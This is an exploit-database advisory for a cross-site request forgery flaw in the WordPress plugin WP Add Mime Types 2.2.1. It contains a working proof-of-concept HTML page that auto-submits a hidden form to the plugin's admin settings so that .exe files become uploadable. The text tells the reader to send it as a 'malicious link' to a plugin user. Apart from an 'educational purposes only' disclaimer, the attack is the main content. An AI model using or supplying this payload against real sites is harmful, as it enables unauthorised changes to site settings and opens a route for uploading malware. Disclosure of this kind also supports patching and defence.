Exploits / Vulnerability Discovered : 2019-08-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin add mime types 2.2.1 crosssite request forgery is for educational purposes only and if it is used you will do on your own risk!
#About Plugin
The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
#Vulnerable Description
WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
## CSRF Code
Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>